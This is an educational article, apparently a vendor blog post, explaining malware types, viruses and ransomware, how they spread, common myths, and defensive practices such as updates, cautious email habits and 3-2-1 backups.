What Is Malware?
Malware, short for “malicious software”, is a general concept that includes any external malicious code that can damage a device or corrupt data. When talking about cybersecurity in general, malware is usually the broadest term that can be used in most contexts. Ransomware and viruses are two types of malware. Other types of malware include:
- Spyware allows hackers to track the activity of another device. Spyware gathers personal data, such as credit card information, passwords, usernames, etc., to be used by hackers later to break into machines.
- Bots are malware that connects hacked machines to a central server. This network of machines is known as a botnet. Botnets can remain undetected, even when they include millions of devices. While using the power of a hacked machine, botnets can send phishing messages and spam, steal personal information and perform denial-of-service (DDoS) attacks.
- Rootkits allows hackers to control a device without the user being aware of it. Once installed, a rootkit can change system configuration and download other malicious files.
- Worms are programs that automatically spread between computers on the same network without a host file. Worms can delete or modify information, steal data or install additional malware. Worms aren’t that popular today, but other malicious software still use the same attack method.
- Trojan Horses, unlike worms, need a host to function. They are undercover malware, as they are generally disguised as legitimate files. Trojans mainly spread through phishing. However, it is not the only way. Trojan attacks sometimes appear integrated into a fake antivirus that pops up on a website offering protection for a device. Once installed on a computer, Trojans allow spying and data modification.
- Adware is malware in the form of well-known pop-ups. It usually goes hand in hand with free games or other unlicensed programs. Sometimes, the only threat it poses is slowing down your machine. However, in some cases, it can also lead to spyware installation.
- Fileless malware is malicious code that goes straight into the computer’s memory and corrupts trusted programs like PowerShell or Windows scripts. Unlike other types, fileless malware usually doesn’t leave a malware trace and, thus, is harder to detect by scanners.
However, viruses and ransomware are the most widespread types of malware.
What Is a Virus?
A virus is a malicious program that spreads through infected websites and files. When a device is exposed to a virus, the virus is installed and starts running without the user’s knowledge. Viruses can corrupt data, damage a device and interfere with its performance, formatting the hard drive. Some viruses can replicate and spread across a local network. Even a simple virus can significantly slow down the system by using the computer’s memory and cause frequent crashes.
How do viruses spread?
Even careful system administrators and users, who take precautions against potential malware threats, have probably been exposed to a virus at some point. Viruses spread in various ways. A virus can get into an environment’s network through everyday activities like:
- Exchanging data between devices
- Visiting infected websites (a device can get infected even without downloading files)
- Downloading torrent files or other free software
- Using external storage devices (like USB drives) that were previously connected to an infected computer
- Opening infected email attachments
Viruses: myths and facts
Myth 1: You’ll definitely know when your computer gets infected.
Fact: Malware often spreads undetected. That’s why you won’t always be able to tell whether a device is infected.
Myth 2: Credible websites don’t contain viruses and other malware.
Fact: Hackers can run malicious ads on reputable websites. Even viewing an ad without clicking on it can install malware. Sometimes, even the most well-known websites can be infected with malware.
Myth 3: Apple devices are safe from viruses.
Fact: This is a deeply rooted misconception because any device can get infected, whether running macOS or another OS. Hackers refine their programs to penetrate any system and environment.
Myth 4: Emails from credible sources can’t be infected. It’s always safe to open email attachments from trusted sources.
Fact: Even when an email comes from a trusted source (colleague, friend, etc.), there is no guarantee that it is safe. Some viruses sneak into the contact list and infect emails. So, if an email attachment seems suspicious, it’s better to avoid opening it.
Myth 5: When there isn’t any critical data on a computer, malicious software is not a threat.
Fact: Even if a device doesn’t store any critical data, malware still poses a threat to security. Malware rarely looks for data. Instead, it accesses a contact list to send spam emails or uses the memory and power of a machine and, as a result, of the whole network.
Myth 6: Firewalls offer complete virus protection.
Fact: Firewalls provide various types of protection, mainly filtering traffic and restricting unauthorized access to data. However, malware can still access a device and spread through the network.
What Is a Ransomware Virus?
Strictly speaking, there is no such term as “ransomware virus”. Unlike viruses, ransomware is not a self-replicating infection, but criminals can use viruses as part of more complex ransomware attacks. Ransomware functions based on encryption, one of the most effective security technologies initially created to protect computers. Encryption transforms data into a secret code that can only be decoded by using a decryption key.
Hackers request victims to pay a ransom, usually in Bitcoin, to obtain the decryption key and regain access to their files. However, not all ransomware attacks aim for financial gain. In some cases like with ransomware wipers (for example, NotPetya), the hacker’s goal is disruption or data removal, so criminals can generate fake crypto wallet addresses or request their victims to pay unrealistic ransoms.
Naturally, companies are afraid of lost trust and reputational damage. So, paying the ransom seems like a quick solution to resolve the situation. However, paying the ransom never guarantees regaining access to your systems.
Instead of financing hackers and wondering if you can regain access to your data, a much better solution is to back up your workloads. The best approach to ransomware protection is having a 3-2-1 backup plan that includes immutable and air-gapped backups. Such a plan means that you should have a minimum of three (3) backup copies, store two (2) of them on different media, and keep one (1) offsite. With this backup plan, your recovery process will be fast and simple, even after a ransomware attack.
How does ransomware spread?
Some of the most common ways that ransomware spreads are:
- Phishing emails are spam emails that include a malicious attachment or link. Once the attachment or link is opened, ransomware is downloaded on the machine. Sometimes the sender of the email can be someone in your contacts.
- Links in messages on social media can contain a malicious link that can activate ransomware on a device.
- Malicious websites can lead to ransomware deployment after you visit them. This is common on streaming video platforms and other free-content websites.
- Additional malware attacks devices that already belong to a botnet (a server that groups hacked computers). In this case, the device gets infected further with additional malicious software.
Ransomware: myths and facts
Myth 1: Ransomware attacks businesses and not individuals.
Fact: Ransomware doesn’t differentiate. Both individuals and businesses can be targets of ransomware attacks.
Myth 2: You always get data back after paying the ransom.
Fact: In the majority of cases, those who pay the ransom do not regain access to their data. Paying the ransom seems like an easy and fast solution to make the problem go away. However, paying the ransom means financing cybercrime and incentivizing hackers to carry out more attacks without having any guarantees of getting decryption keys.
Myth 3: Ransomware can’t encrypt backups.
Fact: While regular backups are the best way to protect your data, there’s a risk that these backups could include infected workloads or be corrupted by third parties. To mitigate these risks, it’s essential to run regular malware scans, follow the3-2-1 backup
rule, and implement security measures such as encryption, immutability and role-based access control to backup data.
How to avoid ransomware, viruses and other threatware?
After learning the differences between the types of malware, the first question that comes to mind is: Can a malware attack be prevented? There are multiple ways a user can secure a device from getting infected. The best solution is to follow basic cybersecurity rules:
- Get antivirus, antispyware and firewall protection, and always keep it up-to-date.
- Update your operating system and applications regularly.
- Improve your browser security settings and block pop-ups.
- Avoid opening messages and emails from unknown senders.
- Don’t open suspicious attachments, links and websites.
- Evaluate free programs, files and software before downloading.
- Set strong passwords and change your login details regularly.
Sticking to these rules minimizes the risk of having malicious software infect a device. However, nothing can guarantee 100% security. That’s why it is crucial to back up your data in multiple locations, preferably sticking to the 3-2-1 backup plan that includes immutable, encrypted and air-gapped backups. This way, even in case of a ransomware attack, you will be able to restore your data with a few clicks.